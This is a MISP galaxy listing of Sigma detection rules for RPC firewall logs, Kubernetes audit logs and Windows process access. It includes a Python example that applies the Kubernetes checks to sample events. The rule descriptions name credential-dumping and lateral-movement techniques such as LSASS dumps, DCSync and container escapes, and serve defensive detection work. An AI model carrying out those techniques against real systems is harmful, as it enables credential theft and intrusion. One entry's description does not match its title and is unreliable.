UUID 7f7c49eb-2977-4ac8-8ab0-ab1bae14730e which can be used as unique global reference for Remote Schedule Task Recon via ITaskSchedulerService in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sagie Dulce, Dekel Paz
creation_date 2022/01/01
falsepositive ['Unknown']
filename rpc_firewall_itaskschedulerservice_recon.yml
level high
logsource.category application
logsource.product rpc_firewall
tags ['attack.discovery']

Remote Server Service Abuse for Lateral Movement

Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR

Internal MISP references

UUID 10018e73-06ec-46ec-8107-9172f1e04ff2 which can be used as unique global reference for Remote Server Service Abuse for Lateral Movement in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sagie Dulce, Dekel Paz
creation_date 2022/01/01
falsepositive ['Administrative tasks on remote services']
filename rpc_firewall_remote_service_lateral_movement.yml
level high
logsource.category application
logsource.product rpc_firewall
tags ['attack.lateral_movement', 'attack.t1569.002']

Remote Schedule Task Lateral Movement via ATSvc

Detects remote RPC calls to create or execute a scheduled task via ATSvc

Internal MISP references

UUID 0fcd1c79-4eeb-4746-aba9-1b458f7a79cb which can be used as unique global reference for Remote Schedule Task Lateral Movement via ATSvc in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sagie Dulce, Dekel Paz
creation_date 2022/01/01
falsepositive ['Unknown']
filename rpc_firewall_atsvc_lateral_movement.yml
level high
logsource.category application
logsource.product rpc_firewall
tags ['attack.lateral_movement', 'attack.t1053', 'attack.t1053.002']
Related clusters

To see the related clusters, click here.

Possible DCSync Attack

Detects remote RPC calls to MS-DRSR from non-DC hosts, which could indicate DCSync / DCShadow attacks.

Internal MISP references

UUID 56fda488-113e-4ce9-8076-afc2457922c3 which can be used as unique global reference for Possible DCSync Attack in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sagie Dulce, Dekel Paz
creation_date 2022/01/01
falsepositive ['Unknown']
filename rpc_firewall_dcsync_attack.yml
level high
logsource.category application
logsource.product rpc_firewall
tags ['attack.t1033', 'attack.discovery']
Related clusters

To see the related clusters, click here.

Remote Event Log Recon

Detects remote RPC calls to get event log information via EVEN or EVEN6

Internal MISP references

UUID 2053961f-44c7-4a64-b62d-f6e72800af0d which can be used as unique global reference for Remote Event Log Recon in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sagie Dulce, Dekel Paz
creation_date 2022/01/01
falsepositive ['Remote administrative tasks on Windows Events']
filename rpc_firewall_eventlog_recon.yml
level high
logsource.category application
logsource.product rpc_firewall
tags ['attack.discovery']

Remote Schedule Task Lateral Movement via ITaskSchedulerService

Detects remote RPC calls to create or execute a scheduled task

Internal MISP references

UUID ace3ff54-e7fd-46bd-8ea0-74b49a0aca1d which can be used as unique global reference for Remote Schedule Task Lateral Movement via ITaskSchedulerService in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sagie Dulce, Dekel Paz
creation_date 2022/01/01
falsepositive ['Unknown']
filename rpc_firewall_itaskschedulerservice_lateral_movement.yml
level high
logsource.category application
logsource.product rpc_firewall
tags ['attack.lateral_movement', 'attack.t1053', 'attack.t1053.002']
Related clusters

To see the related clusters, click here.

Remote DCOM/WMI Lateral Movement

Detects remote RPC calls that perform remote DCOM operations. These could be abused for lateral movement via DCOM or WMI.

Internal MISP references

UUID 68050b10-e477-4377-a99b-3721b422d6ef which can be used as unique global reference for Remote DCOM/WMI Lateral Movement in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sagie Dulce, Dekel Paz
creation_date 2022/01/01
falsepositive ['Some administrative tasks on remote host']
filename rpc_firewall_remote_dcom_or_wmi.yml
level high
logsource.category application
logsource.product rpc_firewall
tags ['attack.lateral_movement', 'attack.t1021.003', 'attack.t1047']
Related clusters

To see the related clusters, click here.

Remote Schedule Task Lateral Movement via SASec

Detects remote RPC calls to create or execute a scheduled task via SASec

Internal MISP references

UUID aff229ab-f8cd-447b-b215-084d11e79eb0 which can be used as unique global reference for Remote Schedule Task Lateral Movement via SASec in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sagie Dulce, Dekel Paz
creation_date 2022/01/01
falsepositive ['Unknown']
filename rpc_firewall_sasec_lateral_movement.yml
level high
logsource.category application
logsource.product rpc_firewall
tags ['attack.lateral_movement', 'attack.t1053', 'attack.t1053.002']
Related clusters

To see the related clusters, click here.

Remote Printing Abuse for Lateral Movement

Detects remote RPC calls to possibly abuse remote printing service via MS-RPRN / MS-PAR

Internal MISP references

UUID bc3a4b0c-e167-48e1-aa88-b3020950e560 which can be used as unique global reference for Remote Printing Abuse for Lateral Movement in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sagie Dulce, Dekel Paz
creation_date 2022/01/01
falsepositive ['Actual printing']
filename rpc_firewall_printing_lateral_movement.yml
level high
logsource.category application
logsource.product rpc_firewall
tags ['attack.lateral_movement']

SharpHound Recon Sessions

Detects remote RPC calls used by SharpHound to map remote connections and local group membership.

Internal MISP references

UUID 6d580420-ff3f-4e0e-b6b0-41b90c787e28 which can be used as unique global reference for SharpHound Recon Sessions in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sagie Dulce, Dekel Paz
creation_date 2022/01/01
falsepositive ['Unknown']
filename rpc_firewall_sharphound_recon_sessions.yml
level high
logsource.category application
logsource.product rpc_firewall
tags ['attack.t1033']
Related clusters

To see the related clusters, click here.

Remote Encrypting File System Abuse

Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR

Internal MISP references

UUID 5f92fff9-82e2-48eb-8fc1-8b133556a551 which can be used as unique global reference for Remote Encrypting File System Abuse in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sagie Dulce, Dekel Paz
creation_date 2022/01/01
falsepositive ['Legitimate usage of remote file encryption']
filename rpc_firewall_efs_abuse.yml
level high
logsource.category application
logsource.product rpc_firewall
tags ['attack.lateral_movement']

Recon Activity via SASec

Detects remote RPC calls to read information about scheduled tasks via SASec

Internal MISP references

UUID 0a3ff354-93fc-4273-8a03-1078782de5b7 which can be used as unique global reference for Recon Activity via SASec in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sagie Dulce, Dekel Paz
creation_date 2022/01/01
falsepositive ['Unknown']
filename rpc_firewall_sasec_recon.yml
level high
logsource.category application
logsource.product rpc_firewall
tags ['attack.discovery']

Remote Registry Lateral Movement

Detects remote RPC calls to modify the registry and possibly execute code

Internal MISP references

UUID 35c55673-84ca-4e99-8d09-e334f3c29539 which can be used as unique global reference for Remote Registry Lateral Movement in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sagie Dulce, Dekel Paz
creation_date 2022/01/01
falsepositive ['Remote administration of registry values']
filename rpc_firewall_remote_registry_lateral_movement.yml
level high
logsource.category application
logsource.product rpc_firewall
tags ['attack.lateral_movement', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Remote Server Service Abuse

Detects remote RPC calls that may abuse the Server Service (MS-SRVS), for example to create a remote share, as a step in lateral movement

Internal MISP references

UUID b6ea3cc7-542f-43ef-bbe4-980fbed444c7 which can be used as unique global reference for Remote Server Service Abuse in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sagie Dulce, Dekel Paz
creation_date 2022/01/01
falsepositive ['Legitimate remote share creation']
filename rpc_firewall_remote_server_service_abuse.yml
level high
logsource.category application
logsource.product rpc_firewall
tags ['attack.lateral_movement']

Remote Schedule Task Recon via ATSvc

Detects remote RPC calls to read information about scheduled tasks via ATSvc

Internal MISP references

UUID f177f2bc-5f3e-4453-b599-57eefce9a59c which can be used as unique global reference for Remote Schedule Task Recon via ATSvc in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sagie Dulce, Dekel Paz
creation_date 2022/01/01
falsepositive ['Unknown']
filename rpc_firewall_atsvc_recon.yml
level high
logsource.category application
logsource.product rpc_firewall
tags ['attack.discovery']

Potential Server Side Template Injection In Velocity

Detects exceptions raised by the Velocity template renderer. These most likely result from dynamic rendering of user-controlled input, which can lead to server-side template injection and remote code execution.

Internal MISP references

UUID 16c86189-b556-4ee8-b4c7-7e350a195a4f which can be used as unique global reference for Potential Server Side Template Injection In Velocity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Moti Harmats
creation_date 2023/02/11
falsepositive ['Application bugs', 'Missing .vm files']
filename velocity_ssti_injection.yml
level high
logsource.category application
logsource.product velocity
tags ['attack.initial_access', 'attack.t1190']
Related clusters

To see the related clusters, click here.

Privileged Container Deployed

Detects the creation of a "privileged" container, an action which could be indicative of a threat actor mounting a container breakout attack. A privileged container is a container that can access the host with all of the root capabilities of the host machine. This allows it to view, interact with and modify processes, network operations, IPC calls, the file system, mount points, SELinux configuration etc. as the root user on the host. Various forms of "privileged" container can be specified, e.g. by setting the securityContext.privileged flag in the resource specification, adding non-standard Linux capabilities, or enabling the hostNetwork/hostPID fields.

Internal MISP references

UUID c5cd1b20-36bb-488d-8c05-486be3d0cb97 which can be used as unique global reference for Privileged Container Deployed in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Leo Tsaousis (@laripping)
creation_date 2024/03/26
falsepositive ['Unknown']
filename kubernetes_audit_privileged_pod_creation.yml
level low
logsource.category application
logsource.product kubernetes
tags ['attack.t1611']
Related clusters

To see the related clusters, click here.

RBAC Permission Enumeration Attempt

Detects identities attempting to enumerate their Kubernetes RBAC permissions. In the early stages of a breach, attackers will aim to list the permissions they have within the compromised environment. In a Kubernetes cluster, this can be achieved by interacting with the API server and creating a SelfSubjectRulesReview (what "kubectl auth can-i --list" does) or a SelfSubjectAccessReview ("kubectl auth can-i <verb> <resource>"). This enumerates the Role-Based Access Control (RBAC) rules defining the compromised identity's authorization.

Internal MISP references

UUID 84b777bd-c946-4d17-aa2e-c39f5a454325 which can be used as unique global reference for RBAC Permission Enumeration Attempt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Leo Tsaousis (@laripping)
creation_date 2024/03/26
falsepositive ['Unknown']
filename kubernetes_audit_rbac_permisions_listing.yml
level low
logsource.category application
logsource.product kubernetes
tags ['attack.t1069.003', 'attack.t1087.004']
Related clusters

To see the related clusters, click here.

Kubernetes Secrets Enumeration

Detects enumeration of Kubernetes secrets.

Internal MISP references

UUID eeb3e9e1-b685-44e4-9232-6bb701f925b5 which can be used as unique global reference for Kubernetes Secrets Enumeration in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Leo Tsaousis (@laripping)
creation_date 2024/03/26
falsepositive ['The Kubernetes dashboard occasionally accesses the kubernetes-dashboard-key-holder secret']
filename kubernetes_audit_secrets_enumeration.yml
level low
logsource.category application
logsource.product kubernetes
tags ['attack.t1552.007']
Related clusters

To see the related clusters, click here.

Kubernetes Events Deleted

Detects when events are deleted in Kubernetes. An adversary may delete Kubernetes events in an attempt to evade detection.

Internal MISP references

UUID 3132570d-cab2-4561-9ea6-1743644b2290 which can be used as unique global reference for Kubernetes Events Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Leo Tsaousis (@laripping)
creation_date 2024/03/26
falsepositive ['Unknown']
filename kubernetes_audit_events_deleted.yml
level medium
logsource.category application
logsource.product kubernetes
tags ['attack.t1070']
Related clusters

To see the related clusters, click here.

Potential Sidecar Injection Into Running Deployment

Detects attempts to inject a sidecar container into a running deployment. A sidecar container is an additional container within a pod that resides alongside the main container. One way to add containers to running resources like Deployments/DaemonSets/StatefulSets is via a "kubectl patch" operation. By injecting a new container into a legitimate pod, an attacker can run their code and hide their activity instead of running their own separate pod in the cluster.

Internal MISP references

UUID ad9012a6-e518-4432-9890-f3b82b8fc71f which can be used as unique global reference for Potential Sidecar Injection Into Running Deployment in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Leo Tsaousis (@laripping)
creation_date 2024/03/26
falsepositive ['Unknown']
filename kubernetes_audit_sidecar_injection.yml
level medium
logsource.category application
logsource.product kubernetes
tags ['attack.t1609']
Related clusters

To see the related clusters, click here.

Deployment Deleted From Kubernetes Cluster

Detects the removal of a deployment from a Kubernetes cluster. This could indicate disruptive activity aiming to impact business operations.

Internal MISP references

UUID 40967487-139b-4811-81d9-c9767a92aa5a which can be used as unique global reference for Deployment Deleted From Kubernetes Cluster in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Leo Tsaousis (@laripping)
creation_date 2024/03/26
falsepositive ['Unknown']
filename kubernetes_audit_deployment_deleted.yml
level low
logsource.category application
logsource.product kubernetes
tags ['attack.t1498']
Related clusters

To see the related clusters, click here.

New Kubernetes Service Account Created

Detects creation of new Kubernetes service account, which could indicate an attacker's attempt to persist within a cluster.

Internal MISP references

UUID e31bae15-83ed-473e-bf31-faf4f8a17d36 which can be used as unique global reference for New Kubernetes Service Account Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Leo Tsaousis (@laripping)
creation_date 2024/03/26
falsepositive ['Unknown']
filename kubernetes_audit_serviceaccount_creation.yml
level low
logsource.category application
logsource.product kubernetes
tags ['attack.t1136']
Related clusters

To see the related clusters, click here.

Potential Remote Command Execution In Pod Container

Detects attempts to execute remote commands within a Pod's container using e.g. the "kubectl exec" command.

Internal MISP references

UUID a1b0ca4e-7835-413e-8471-3ff2b8a66be6 which can be used as unique global reference for Potential Remote Command Execution In Pod Container in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Leo Tsaousis (@laripping)
creation_date 2024/03/26
falsepositive ['Legitimate debugging activity. Investigate the identity performing the requests and their authorization.']
filename kubernetes_audit_exec_into_container.yml
level medium
logsource.category application
logsource.product kubernetes
tags ['attack.t1609']
Related clusters

To see the related clusters, click here.

Container With A hostPath Mount Created

Detects creation of a container with a hostPath mount. A hostPath volume mounts a directory or a file from the node to the container. Attackers who have permissions to create a new pod in the cluster may create one with a writable hostPath volume and chroot to escape to the underlying node.

Internal MISP references

UUID 402b955c-8fe0-4a8c-b635-622b4ac5f902 which can be used as unique global reference for Container With A hostPath Mount Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Leo Tsaousis (@laripping)
creation_date 2024/03/26
falsepositive ['The DaemonSet controller creates pods with hostPath volumes within the kube-system namespace.']
filename kubernetes_audit_hostpath_mount.yml
level low
logsource.category application
logsource.product kubernetes
tags ['attack.t1611']
Related clusters

To see the related clusters, click here.

Creation Of Pod In System Namespace

Detects deployments of pods within the kube-system namespace, which could be intended to imitate system pods. System pods, created by controllers such as Deployments or DaemonSets, have random suffixes in their names. Attackers can use this fact and name their backdoor pods as if they were created by these controllers to avoid detection. Deployment of such a backdoor container, e.g. named kube-proxy-bv61v, could be attempted in the kube-system namespace alongside the other administrative containers.

Internal MISP references

UUID a80d927d-ac6e-443f-a867-e8d6e3897318 which can be used as unique global reference for Creation Of Pod In System Namespace in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Leo Tsaousis (@laripping)
creation_date 2024/03/26
falsepositive ['System components such as daemon-set-controller and kube-scheduler also create pods in the kube-system namespace']
filename kubernetes_audit_pod_in_system_namespace.yml
level medium
logsource.category application
logsource.product kubernetes
tags ['attack.t1036.005']
Related clusters

To see the related clusters, click here.
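The Kubernetes rules above each describe what to look for in the API server audit log, but not how the checks combine over a stream of events. The following Python, added here as an illustration and not taken from the Sigma rules or from MISP, applies the catalogued checks (RBAC enumeration, secrets enumeration, event deletion, pod exec, privileged pod, hostPath mount, pod in kube-system, sidecar patch, deployment deletion, service account creation) to a handful of constructed audit.k8s.io/v1 events. Assumed and not from the page: the audit policy logs pod creations and workload patches at RequestResponse level so that requestObject is present; the DANGEROUS_CAPS set is this example's own notion of a "non-standard" capability; usernames beginning with "system:" are treated as cluster components, which is the documented false positive for the hostPath and kube-system rules.

```python
"""Added example (not Sigma or MISP project code): apply the Kubernetes audit
checks catalogued above to constructed audit.k8s.io/v1 events."""

SYSTEM_USER_PREFIX = "system:"                      # cluster components (documented FPs)
DANGEROUS_CAPS = {"ALL", "SYS_ADMIN", "SYS_PTRACE", "SYS_MODULE", "NET_ADMIN"}  # assumption
WORKLOAD_KINDS = ("deployments", "daemonsets", "statefulsets")

# Constructed sample events, trimmed to the fields the checks read.
SAMPLE_EVENTS = [
    {"verb": "create", "user": {"username": "dev-alice"},
     "objectRef": {"resource": "selfsubjectrulesreviews"}},            # kubectl auth can-i --list
    {"verb": "list", "user": {"username": "dev-alice"},
     "objectRef": {"resource": "secrets", "namespace": "prod"}},
    {"verb": "create", "user": {"username": "dev-alice"},
     "objectRef": {"resource": "pods", "subresource": "exec", "namespace": "prod", "name": "web-7f6d"}},
    {"verb": "create", "user": {"username": "dev-alice"},
     "objectRef": {"resource": "pods", "namespace": "kube-system", "name": "kube-proxy-bv61v"},
     "requestObject": {"spec": {"hostPID": True,
                                "containers": [{"name": "c", "image": "alpine",
                                                "securityContext": {"privileged": True}}],
                                "volumes": [{"name": "host", "hostPath": {"path": "/"}}]}}},
    {"verb": "patch", "user": {"username": "dev-alice"},
     "objectRef": {"resource": "deployments", "namespace": "prod", "name": "web"},
     "requestObject": {"spec": {"template": {"spec": {"containers": [{"name": "side", "image": "x"}]}}}}},
    {"verb": "delete", "user": {"username": "dev-alice"},
     "objectRef": {"resource": "events", "namespace": "prod"}},
    {"verb": "create", "user": {"username": "system:serviceaccount:kube-system:daemon-set-controller"},
     "objectRef": {"resource": "pods", "namespace": "kube-system", "name": "kube-proxy-abcde"},
     "requestObject": {"spec": {"containers": [{"name": "kube-proxy", "image": "kube-proxy"}],
                                "volumes": [{"name": "lib", "hostPath": {"path": "/lib/modules"}}]}}},
    {"verb": "get", "user": {"username": "dev-alice"},
     "objectRef": {"resource": "pods", "namespace": "prod"}},
]


def _spec(event):
    """Object spec from requestObject ({} when the policy did not log the body)."""
    return (event.get("requestObject") or {}).get("spec") or {}


def _containers(spec):
    return list(spec.get("containers") or []) + list(spec.get("initContainers") or [])


def is_privileged_pod(spec):
    """True for privileged containers, host namespaces, or dangerous added capabilities."""
    if spec.get("hostPID") or spec.get("hostNetwork") or spec.get("hostIPC"):
        return True
    for c in _containers(spec):
        sc = c.get("securityContext") or {}
        if sc.get("privileged"):
            return True
        if DANGEROUS_CAPS & set((sc.get("capabilities") or {}).get("add") or []):
            return True
    return False


def evaluate(event):
    """Return the names of the catalogued rules this audit event matches."""
    verb = event.get("verb")
    ref = event.get("objectRef") or {}
    res, sub, ns = ref.get("resource"), ref.get("subresource"), ref.get("namespace")
    from_system = (event.get("user") or {}).get("username", "").startswith(SYSTEM_USER_PREFIX)
    spec = _spec(event)
    hits = []
    if verb == "create" and res in ("selfsubjectrulesreviews", "selfsubjectaccessreviews"):
        hits.append("RBAC Permission Enumeration Attempt")
    if verb in ("list", "watch") and res == "secrets":
        hits.append("Kubernetes Secrets Enumeration")
    if verb in ("delete", "deletecollection") and res == "events":
        hits.append("Kubernetes Events Deleted")
    if verb == "create" and res == "pods" and sub == "exec":
        hits.append("Potential Remote Command Execution In Pod Container")
    if verb == "create" and res == "pods" and sub is None:
        if is_privileged_pod(spec):
            hits.append("Privileged Container Deployed")
        if not from_system and any("hostPath" in v for v in spec.get("volumes") or []):
            hits.append("Container With A hostPath Mount Created")
        if not from_system and ns == "kube-system":
            hits.append("Creation Of Pod In System Namespace")
    if verb == "patch" and res in WORKLOAD_KINDS:
        # Simplification: a patch body that touches the pod template's container list.
        if "containers" in ((spec.get("template") or {}).get("spec") or {}):
            hits.append("Potential Sidecar Injection Into Running Deployment")
    if verb == "delete" and res == "deployments":
        hits.append("Deployment Deleted From Kubernetes Cluster")
    if verb == "create" and res == "serviceaccounts":
        hits.append("New Kubernetes Service Account Created")
    return hits


def scan(events):
    """Map event index -> matched rule names, for events with at least one hit."""
    return {i: h for i, e in enumerate(events) if (h := evaluate(e))}


if __name__ == "__main__":
    for i, names in scan(SAMPLE_EVENTS).items():
        ref = SAMPLE_EVENTS[i]["objectRef"]
        print(f"[{i}] {SAMPLE_EVENTS[i]['verb']} {ref.get('resource')}: {names}")
```

The fourth event deliberately trips three rules at once (privileged, hostPath, kube-system), which is the kind of stacking that turns three low-level rules into one incident; the DaemonSet controller event, which legitimately creates hostPath pods in kube-system, is suppressed by the system-identity check rather than by turning the rules off.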

Credential Dumping Attempt Via Svchost

Detects when a process tries to access the memory of svchost to potentially dump credentials.

Internal MISP references

UUID 174afcfa-6e40-4ae9-af64-496546389294 which can be used as unique global reference for Credential Dumping Attempt Via Svchost in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florent Labouyrie
creation_date 2021/04/30
falsepositive ['Unknown']
filename proc_access_win_svchost_credential_dumping.yml
level high
logsource.category process_access
logsource.product windows
tags ['attack.t1548']
Related clusters

To see the related clusters, click here.

Remote LSASS Process Access Through Windows Remote Management

Detects remote access to the LSASS process via WinRM. This could be a sign of credential dumping from tools like mimikatz.

Internal MISP references

UUID aa35a627-33fb-4d04-a165-d33b4afca3e8 which can be used as unique global reference for Remote LSASS Process Access Through Windows Remote Management in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Patryk Prauze - ING Tech
creation_date 2019/05/20
falsepositive ['Unlikely']
filename proc_access_win_lsass_remote_access_trough_winrm.yml
level high
logsource.category process_access
logsource.product windows
tags ['attack.credential_access', 'attack.execution', 'attack.t1003.001', 'attack.t1059.001', 'attack.lateral_movement', 'attack.t1021.006', 'attack.s0002']
Related clusters

To see the related clusters, click here.

Lsass Memory Dump via Comsvcs DLL

Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.

Internal MISP references

UUID a49fa4d5-11db-418c-8473-1e014a8dd462 which can be used as unique global reference for Lsass Memory Dump via Comsvcs DLL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/10/20
falsepositive ['Unknown']
filename proc_access_win_lsass_dump_comsvcs_dll.yml
level high
logsource.category process_access
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

CMSTP Execution Process Access

Detects various indicators of Microsoft Connection Manager Profile Installer execution

Internal MISP references

UUID 3b4b232a-af90-427c-a22f-30b0c0837b95 which can be used as unique global reference for CMSTP Execution Process Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nik Seetharaman
creation_date 2018/07/16
falsepositive ['Legitimate CMSTP use (unlikely in modern enterprise environments)']
filename proc_access_win_cmstp_execution_by_access.yml
level high
logsource.category process_access
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.003', 'attack.execution', 'attack.t1559.001', 'attack.g0069', 'attack.g0080', 'car.2019-04-001']
Related clusters

To see the related clusters, click here.

HackTool - Generic Process Access

Detects process access requests from hacktool processes based on their default image name

Internal MISP references

UUID d0d2f720-d14f-448d-8242-51ff396a334e which can be used as unique global reference for HackTool - Generic Process Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel
creation_date 2023/11/27
falsepositive ['Unlikely']
filename proc_access_win_hktl_generic_access.yml
level high
logsource.category process_access
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001', 'attack.s0002']
Related clusters

To see the related clusters, click here.

Credential Dumping Attempt Via WerFault

Detects WerFault.exe accessing the LSASS process with rights that allow its memory to be read. Because the Windows Error Reporting process legitimately writes crash dumps, abusing it is a way to obtain an LSASS memory dump under the cover of a trusted Windows binary.

Internal MISP references

UUID e5b33f7d-eb93-48b6-9851-09e1e610b6d7 which can be used as unique global reference for Credential Dumping Attempt Via WerFault in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2012/06/27
falsepositive ['Actual failures in lsass.exe that trigger a crash dump (unlikely)', 'Unknown cases in which WerFault accesses lsass.exe']
filename proc_access_win_lsass_werfault.yml
level high
logsource.category process_access
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001', 'attack.s0002']
Related clusters

To see the related clusters, click here.

Potential Direct Syscall of NtOpenProcess

Detects potential calls to NtOpenProcess directly from NTDLL.

Internal MISP references

UUID 3f3f3506-1895-401b-9cc3-e86b16e630d0 which can be used as unique global reference for Potential Direct Syscall of NtOpenProcess in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems), Tim Shelton (FP)
creation_date 2021/07/28
falsepositive ['Unknown']
filename proc_access_win_susp_direct_ntopenprocess_call.yml
level medium
logsource.category process_access
logsource.product windows
tags ['attack.execution', 'attack.t1106']
Related clusters

To see the related clusters, click here.

Suspicious LSASS Access Via MalSecLogon

Detects suspicious access to LSASS handle via a call trace to "seclogon.dll" with a suspicious access right.

Internal MISP references

UUID 472159c5-31b9-4f56-b794-b766faa8b0a7 which can be used as unique global reference for Suspicious LSASS Access Via MalSecLogon in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/29
falsepositive ['Unknown']
filename proc_access_win_lsass_seclogon_access.yml
level high
logsource.category process_access
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Suspicious Svchost Process Access

Detects suspicious access to the "svchost" process such as that used by Invoke-Phantom to kill the thread of the Windows event logging service.

Internal MISP references

UUID 166e9c50-8cd9-44af-815d-d1f0c0e90dde which can be used as unique global reference for Suspicious Svchost Process Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Burrell
creation_date 2020/01/02
falsepositive ['Unknown']
filename proc_access_win_svchost_susp_access_request.yml
level high
logsource.category process_access
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.002']
Related clusters

To see the related clusters, click here.

UAC Bypass Using WOW64 Logger DLL Hijack

Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)

Internal MISP references

UUID 4f6c43e2-f989-4ea5-bcd8-843b49a0317c which can be used as unique global reference for UAC Bypass Using WOW64 Logger DLL Hijack in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/23
falsepositive ['Unknown']
filename proc_access_win_uac_bypass_wow64_logger.yml
level high
logsource.category process_access
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Potential Shellcode Injection

Detects potential shellcode injection used by tools such as Metasploit's migrate and Empire's psinject

Internal MISP references

UUID 250ae82f-736e-4844-a68b-0b5e8cc887da which can be used as unique global reference for Potential Shellcode Injection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bhabesh Raj
creation_date 2022/03/11
falsepositive ['Unknown']
filename proc_access_win_susp_shellcode_injection.yml
level high
logsource.category process_access
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1055']
Related clusters

To see the related clusters, click here.

HackTool - LittleCorporal Generated Maldoc Injection

Detects the process injection of a LittleCorporal generated Maldoc.

Internal MISP references

UUID 7bdde3bf-2a42-4c39-aa31-a92b3e17afac which can be used as unique global reference for HackTool - LittleCorporal Generated Maldoc Injection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/09
falsepositive ['Unknown']
filename proc_access_win_hktl_littlecorporal_generated_maldoc.yml
level high
logsource.category process_access
logsource.product windows
tags ['attack.execution', 'attack.t1204.002', 'attack.t1055.003']
Related clusters

To see the related clusters, click here.

Potential Credential Dumping Activity Via LSASS

Detects process access requests to the LSASS process with specific call trace calls and access masks. This behaviour is expressed by many credential dumping tools such as Mimikatz, NanoDump, Invoke-Mimikatz, Procdump and even the Taskmgr dumping feature.

Internal MISP references

UUID 5ef9853e-4d0e-4a70-846f-a9ca37d876da which can be used as unique global reference for Potential Credential Dumping Activity Via LSASS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Samir Bousseaden, Michael Haag
creation_date 2019/04/03
falsepositive ['Unknown']
filename proc_access_win_lsass_memdump.yml
level medium
logsource.category process_access
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001', 'attack.s0002']
Related clusters

To see the related clusters, click here.

HackTool - CobaltStrike BOF Injection Pattern

Detects a typical pattern of a CobaltStrike BOF which injects into other processes

Internal MISP references

UUID 09706624-b7f6-455d-9d02-adee024cee1d which can be used as unique global reference for HackTool - CobaltStrike BOF Injection Pattern in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/04
falsepositive ['Unknown']
filename proc_access_win_hktl_cobaltstrike_bof_injection_pattern.yml
level high
logsource.category process_access
logsource.product windows
tags ['attack.execution', 'attack.t1106', 'attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Potentially Suspicious GrantedAccess Flags On LSASS

Detects process access requests to LSASS process with potentially suspicious access flags

Internal MISP references

UUID a18dd26b-6450-46de-8c91-9659150cf088 which can be used as unique global reference for Potentially Suspicious GrantedAccess Flags On LSASS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community
creation_date 2021/11/22
